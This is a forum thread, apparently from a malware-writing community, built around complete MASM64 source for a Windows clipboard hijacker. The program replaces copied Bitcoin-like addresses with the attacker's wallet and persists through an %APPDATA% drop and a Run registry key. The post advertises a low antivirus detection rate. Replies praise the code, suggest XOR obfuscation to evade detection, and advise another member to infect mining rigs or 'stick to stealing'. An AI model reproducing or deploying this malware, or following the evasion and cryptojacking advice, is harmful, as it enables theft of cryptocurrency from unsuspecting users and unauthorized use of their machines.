Topic: Bitcoin stealer (MASM64)

Replaces a Bitcoin address with the author's own when the victim copies one to the clipboard. Note that the code only checks that the clipboard text is 27–34 characters long and purely alphanumeric ([0-9A-Za-z]) — it performs no Base58/checksum validation, so any clipboard string matching that shape is overwritten.
Drop to %APPDATA% as systemtools.exe.
Entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run for autostart.
Detection rate: 2/56
https://virustotal.com/pl/file/8c1e0ea0 … 480071040/

extrn ExitProcess : proc
extrn MessageBoxA : proc
extrn CreateThread : proc
extrn WaitForSingleObject : proc
extrn Sleep : proc
extrn OpenClipboard : proc
extrn GetClipboardData : proc
extrn GlobalLock : proc
extrn CloseClipboard : proc
extrn GlobalUnlock : proc
extrn lstrlen : proc
extrn RtlCopyMemory : proc
extrn GlobalAlloc : proc
extrn EmptyClipboard : proc
extrn SetClipboardData : proc
extrn IsClipboardFormatAvailable : proc
extrn RegOpenKeyExA : proc
extrn GetModuleFileNameA : proc
extrn RegSetValueExA : proc
extrn RegCloseKey : proc
extrn SHGetFolderPathA : proc
extrn CopyFileA : proc
extrn CreateMutexA : proc
extrn GetLastError : proc
extrn lstrcat : proc

.const
; Clipboard payload bounds: MyThreadProc only replaces clipboard text whose
; lstrlen is within [minLength, maxLength]. This is a length/charset filter,
; not a Base58 or checksum validation of a Bitcoin address.
minLength equ 27
maxLength equ 34
; Win32 clipboard formats. Only CF_TEXT is actually used by the code below;
; CF_OEMTEXT / CF_UNICODETEXT are defined but never referenced.
CF_TEXT equ 1
CF_OEMTEXT equ 7
CF_UNICODETEXT equ 13
GMEM_MOVEABLE equ 2                    ; GlobalAlloc flag for the replacement buffer
ERROR_ALREADY_EXISTS equ 183           ; GetLastError after CreateMutexA => second instance
CSIDL_APPDATA equ 26                   ; SHGetFolderPathA folder id -> %APPDATA%
HKEY_CURRENT_USER equ 80000001h
KEY_SET_VALUE equ 2                    ; used (with KEY_CREATE_SUB_KEY) for RegOpenKeyExA
KEY_CREATE_SUB_KEY equ 4
KEY_WOW64_64KEY equ 0100h              ; defined but not used
KEY_WRITE equ 00020006h                ; defined but not used
REG_SZ equ 00000001h

.data
; --- Host indicators (all stored in cleartext in the image; see VT note above) ---
szAuthorWebsite db "http://vxzone.pl/", 0                        ; not referenced by any code; string IOC only
szYourBitcoinWalletAddress db "YourBitcoinWalletAddressHere", 0   ; attacker-controlled address written back to the clipboard
hThread dq 0                                                      ; CreateThread handle (Main)
dqThreadId dq 0                                                   ; never written: its *value* (0) is passed as lpThreadId
hClipboard dq 0                                                   ; HGLOBAL returned by GetClipboardData
pClipboard dq 0                                                   ; GlobalLock'ed pointer into the clipboard buffer
hGlobal dq 0                                                      ; HGLOBAL holding the replacement text
pGlobal dq 0
dqLength dq 0                                                     ; lstrlen(szYourBitcoinWalletAddress)+1
szMutex db "8F7FFFZ7-78B7-45HH-A9DF-84D02F7EF08X",0              ; single-instance mutex name (CreateMutexA); host IOC
szRegKeyName db "Software\Microsoft\Windows\CurrentVersion\Run",0 ; HKCU Run key used for persistence
szRegValueName db "System Tools",0                                ; Run value name; host IOC
szDroppedFileName db "\systemtools.exe",0                         ; appended to %APPDATA% -> drop path; host IOC
szDropPath db 256 dup(0)                                          ; fixed 256-byte buffer; neither SHGetFolderPathA nor lstrcat is told its size
szApplicationPath db 256 dup(0)                                   ; GetModuleFileNameA buffer (size is passed, see Main)

.code
; Offset, within Main's 38h-byte call frames, where the opened HKEY is kept.
; 28h is also the 6th-argument stack slot of those frames (see the
; RegSetValueExA note in Main).
hReg equ 28h

    ;-------------------------------------------------------------------------
    ; DWORD MyThreadProc(LPVOID unused)
    ; ABI:   Microsoft x64 (MASM64). Every Win32 call is bracketed by
    ;        sub rsp,28h / add rsp,28h = 32-byte shadow space + 8 bytes to keep
    ;        rsp 16-aligned at the call.
    ; Role:  clipboard-poll loop. Never returns: either loops forever or calls
    ;        ExitProcess from errorLabel.
    ; Behaviour (for detection/triage):
    ;   * polls the clipboard every 250 ms (Sleep) for CF_TEXT;
    ;   * if the text is 27..34 bytes of [0-9A-Za-z], empties the clipboard and
    ;     writes szYourBitcoinWalletAddress in its place;
    ;   * the placeholder address is itself 28 alphanumeric bytes, so once
    ;     replaced the clipboard matches again and is re-written on every
    ;     iteration -> continuous EmptyClipboard/SetClipboardData churn.
    ;-------------------------------------------------------------------------
    MyThreadProc proc
        mainLoop:
            ; Poll interval: 250 ms.
            sub rsp, 28h
            mov rcx, 250
            call Sleep
            add rsp, 28h
            
            ; Only ANSI text is considered; CF_UNICODETEXT is ignored even
            ; though a constant for it exists.
            sub rsp, 28h
            mov rcx, CF_TEXT
            call IsClipboardFormatAvailable
            add rsp, 28h
            cmp rax, 0
            je mainLoop
            
            ; OpenClipboard(NULL). Failure (e.g. another process holds it)
            ; terminates the whole process rather than retrying.
            sub rsp, 28h
            xor rcx, rcx
            call OpenClipboard
            add rsp, 28h
            cmp rax, 0
            je errorLabel
    
            ; GetClipboardData(CF_TEXT). On 0 the process exits with the
            ; clipboard still open (no CloseClipboard on this path).
            sub rsp, 28h
            mov rcx, CF_TEXT
            call GetClipboardData
            add rsp, 28h
            cmp rax, 0
            je errorLabel
            mov hClipboard, rax
    
            ; Lock to obtain a pointer; return value not checked for NULL.
            sub rsp, 28h
            mov rcx, hClipboard
            call GlobalLock
            add rsp, 28h
            mov pClipboard, rax
    
            sub rsp, 28h
            mov rcx, hClipboard
            call GlobalUnlock
            add rsp, 28h
    
            sub rsp, 28h
            call CloseClipboard
            add rsp, 28h
    
            ; NOTE: pClipboard is dereferenced from here on, after GlobalUnlock
            ; and CloseClipboard. The buffer is owned by the clipboard and can
            ; be freed/replaced by another clipboard owner in the meantime.
            sub rsp, 28h
            mov rcx, pClipboard
            call lstrlen
            add rsp, 28h
    
            ; Length filter: 27 <= len <= 34 (unsigned compares).
            cmp rax, minLength
            jb mainLoop
            cmp rax, maxLength
            ja mainLoop
            
            ; Charset filter: every byte up to the NUL must be in
            ; '0'..'9', 'A'..'Z' or 'a'..'z'. This accepts characters that
            ; Base58 excludes (0, O, I, l), so non-address strings of this
            ; shape are also replaced.
            ; rcx was zeroed above and len <= 34, so the byte-only `inc cl`
            ; never overflows the index.
            xor rcx, rcx
            mov rsi, pClipboard
            checkLoop:
            mov al, byte ptr [rsi + rcx]
            inc cl
            cmp al, 0
            je replaceWalletAddress
            cmp al, '0'
            jb mainLoop
            cmp al, '9'
            jbe checkLoop
            cmp al, 'A'
            jb mainLoop
            cmp al, 'Z'
            jbe checkLoop
            cmp al, 'a'
            jb mainLoop
            cmp al, 'z'
            jbe checkLoop
            jmp mainLoop
            
            replaceWalletAddress:
            ; dqLength = strlen(attacker address) + 1 (include the NUL).
            sub rsp, 28h
            lea rcx, szYourBitcoinWalletAddress
            call lstrlen
            add rsp, 28h
            inc rax
            mov dqLength, rax
            
            ; GlobalAlloc(GMEM_MOVEABLE, dqLength); result used unchecked.
            sub rsp, 28h
            mov rdx, dqLength
            mov rcx, GMEM_MOVEABLE
            call GlobalAlloc
            add rsp, 28h
            mov hGlobal, rax
            
            ; GlobalLock; NULL is not checked before RtlCopyMemory below.
            sub rsp, 28h
            mov rcx, hGlobal
            call GlobalLock
            add rsp, 28h
            mov pGlobal, rax
            
            ; RtlCopyMemory(pGlobal, szYourBitcoinWalletAddress, dqLength)
            sub rsp, 28h
            mov r8, dqLength
            lea rdx, szYourBitcoinWalletAddress
            mov rcx, pGlobal
            call RtlCopyMemory
            add rsp, 28h
            
            sub rsp, 28h
            mov rcx, hGlobal
            call GlobalUnlock
            add rsp, 28h
            
            ; Re-open the clipboard to publish the replacement; failure exits.
            sub rsp, 28h
            xor rcx, rcx
            call OpenClipboard
            add rsp, 28h
            cmp rax, 0
            je errorLabel
            
            sub rsp, 28h
            call EmptyClipboard
            add rsp, 28h
    
            ; SetClipboardData(CF_TEXT, hGlobal): on success the system takes
            ; ownership of hGlobal. Return value is not checked, so on failure
            ; the HGLOBAL is leaked (one per loop iteration).
            sub rsp, 28h
            mov rdx, hGlobal
            mov rcx, CF_TEXT
            call SetClipboardData
            add rsp, 28h
            
            sub rsp, 28h
            call CloseClipboard
            add rsp, 28h
        jmp mainLoop
        
        errorLabel:
            ; Any clipboard open/read failure kills the process (exit code 0).
            ; No shadow space is reserved here; ExitProcess does not return.
            xor rcx, rcx
            call ExitProcess
    MyThreadProc endp

    ;-------------------------------------------------------------------------
    ; Main — process entry point (Microsoft x64, MASM64).
    ; Sequence (useful for IR/forensics):
    ;   1. CreateMutexA(szMutex); if it already exists, exit (single instance).
    ;   2. Build %APPDATA%\systemtools.exe in szDropPath.
    ;   3. Write HKCU\...\CurrentVersion\Run\"System Tools" = drop path.
    ;   4. CopyFileA(own image -> drop path).
    ;   5. Start MyThreadProc and block on it forever.
    ; No return value of any Win32 call in steps 2-4 is checked.
    ; rbx (callee-saved in this ABI) is used as scratch and never restored;
    ; this only goes unnoticed because Main ends in ExitProcess.
    ;-------------------------------------------------------------------------
    Main proc
    sub rsp, 28h
        ; CreateMutexA(NULL, FALSE, szMutex). The returned handle is ignored;
        ; only GetLastError is consulted to detect a second instance.
        lea r8, szMutex
        xor rdx, rdx
        xor rcx, rcx
        call CreateMutexA
        add rsp, 28h
        
        sub rsp, 28h
        call GetLastError
        add rsp, 28h
        cmp     rax, ERROR_ALREADY_EXISTS
        je     more_than_one_copy
    
        ; SHGetFolderPathA(NULL, CSIDL_APPDATA, NULL, 0, szDropPath)
        ; 38h frame = 20h shadow space + 8 for the 5th argument + 8 alignment.
        ; HRESULT is ignored; szDropPath is a bare 256-byte buffer.
        sub rsp, 38h
        lea rax, szDropPath
        mov [rsp+20h], rax
        mov r9, 0
        mov r8, 0
        mov rdx, CSIDL_APPDATA
        xor rcx, rcx
        call SHGetFolderPathA
        add rsp, 38h
    
        ; szDropPath += "\systemtools.exe" (unbounded lstrcat).
        sub rsp, 28h
        lea rdx, szDroppedFileName
        lea rcx, szDropPath
        call lstrcat
        add rsp, 28h
    
        ; RegOpenKeyExA(HKCU, Run, 0, KEY_SET_VALUE|KEY_CREATE_SUB_KEY, &hKey)
        ; phkResult points at [rsp+hReg] = [rsp+28h]; LSTATUS is ignored, so a
        ; failed open leaves whatever was in that slot as the "handle".
        sub rsp, 38h
        lea rax, [rsp+hReg]
        mov [rsp+20h], rax
        mov r9, KEY_SET_VALUE+KEY_CREATE_SUB_KEY
        mov r8, 0
        lea rdx, szRegKeyName
        mov rcx, HKEY_CURRENT_USER
        call RegOpenKeyExA
        add rsp, 38h
        
        ; RegSetValueExA(hKey, "System Tools", 0, REG_SZ, szDropPath, cbData)
        ; cbData is the 6th argument at [rsp+28h] and is never written here;
        ; that slot is hReg itself (same offset), so the byte count passed is
        ; the low 32 bits of the HKEY handle value, not strlen(szDropPath)+1.
        ; The frame is re-created at the same depth, so [rsp+hReg] still holds
        ; the handle written by RegOpenKeyExA.
        sub rsp, 38h
        lea rbx, szDropPath
        mov [rsp+20h], rbx
        mov r9, REG_SZ
        mov r8, 0
        lea rdx, szRegValueName
        mov rcx, [rsp+hReg]
        call RegSetValueExA
        add rsp, 38h
        
        sub rsp, 38h
        mov rcx, [rsp+hReg]
        call RegCloseKey
        add rsp, 38h
        
        ; GetModuleFileNameA(NULL, szApplicationPath, 256) -> own image path.
        sub rsp, 28h
        mov r8, sizeof szApplicationPath
        lea rdx, szApplicationPath
        mov rcx, 0
        call GetModuleFileNameA
        add rsp, 28h
        
        ; CopyFileA(self, %APPDATA%\systemtools.exe, bFailIfExists=FALSE).
        ; Overwrites an existing drop; there is no check for already running
        ; from the drop path, and the result is ignored.
        sub rsp, 28h
        mov r8, 0
        lea rdx, szDropPath
        lea rcx, szApplicationPath
        call CopyFileA
        add rsp, 28h
    
        ; CreateThread(NULL, 0, MyThreadProc, NULL, 0, lpThreadId)
        ; [rsp+20h] = dwCreationFlags = 0 (run immediately).
        ; [rsp+28h] receives the *value* of dqThreadId (0), not its address,
        ; i.e. lpThreadId = NULL. 48h frame keeps rsp 16-aligned at the call.
        sub rsp, 48h
        mov rax, dqThreadId
        mov [rsp+28h], rax
        xor rax, rax
        mov [rsp+20h], rax
        xor r9, r9
        lea r8, MyThreadProc
        xor rdx, rdx
        xor rcx, rcx
        call CreateThread
        mov hThread, rax
        add rsp, 48h
        
        ; WaitForSingleObject(hThread, INFINITE). MyThreadProc never returns,
        ; so the main thread parks here for the life of the process.
        sub rsp, 28h
        mov rdx, 0FFFFFFFFh
        mov rcx, hThread
        call WaitForSingleObject
        add rsp, 28h
        
        more_than_one_copy:
        ; ExitProcess(0); the add rsp after it is unreachable.
        sub rsp, 28h
        xor rcx, rcx
        call ExitProcess
        add rsp, 28h
    Main endp
end


Re: Bitcoin stealer (MASM64)

YAY! Actual code for once!

I like to examine and theorize about everything, from Amazon's <quote> impenetrable </quote> ultravisor to autorun viruses (virii?) being technology's version of an STD (Slot Transmitted Disease).
I dabble in Python 2.x and non-stereotypical BATCH (x>50 lines). I also fuck up VMs from time to time.

┬──┬ ︵ /(.□. \)


Re: Bitcoin stealer (MASM64)

Yeniaul wrote:

YAY! Actual code for once!

Thank you, someone, for posting something that doesn't disgust me with its lameness  lol

I am growing tired of the lame posts on this site  sad

----
JPanic - Johnny Panic
Ex Immortal Riot/Genesis, NOP, Team MiSSiON
@JPanicVX on Twitter


Re: Bitcoin stealer (MASM64)

Detection rate: 2/56

Before xoring big_smile

Thanks for your code!

"For the Snark was a Boojum, you see."


Re: Bitcoin stealer (MASM64)

actually something cool smile

"There is no spoon." - http://guitmz.com/


Re: Bitcoin stealer (MASM64)

Can someone explain how this works ? Because i want to create a Bitcoin miner virus in Python....

The problem is that i don't understand "how to mine bitcoins".....i searched on the web but it didn't really help  sad



Re: Bitcoin stealer (MASM64)

Can someone explain how this works ?

This code polls the clipboard of a Windows machine every 250 ms and, when it finds a CF_TEXT string that is 27–34 characters long and made only of [0-9A-Za-z], empties the clipboard and writes the author's address in its place. The idea is that the victim pastes the swapped address and the BTC goes to the attacker instead. Note that the check is purely length/charset based — no Base58 or checksum validation — so any clipboard string of that shape gets replaced, and since the replacement address itself matches the filter, the clipboard is re-written on every poll after the first swap.


i want to create a Bitcoin miner virus in Python

Mining is a totally different thing that takes a pretty noticeable amount of computing power unless you've infected a large number of machines.

Mining in python:
https://github.com/m0mchil/poclbm

OpenCL is supported by Windows, Mac and Linux alike, so using poclbm would get your job done. Make sure to use a peer to peer mining pool.

Suggestion: Either write something that infects a mining rig or stick to stealing. Mining on ordinary PCs will get you almost no money these days.

"For the Snark was a Boojum, you see."


Re: Bitcoin stealer (MASM64)

Well, thanks for the reply but i think i won't even try to do it....

I was thinking about creating a malware that infects IoT devices and mines bitcoin...but after i've done some research seems it won't work since the virus will be “just wasting electricity.”
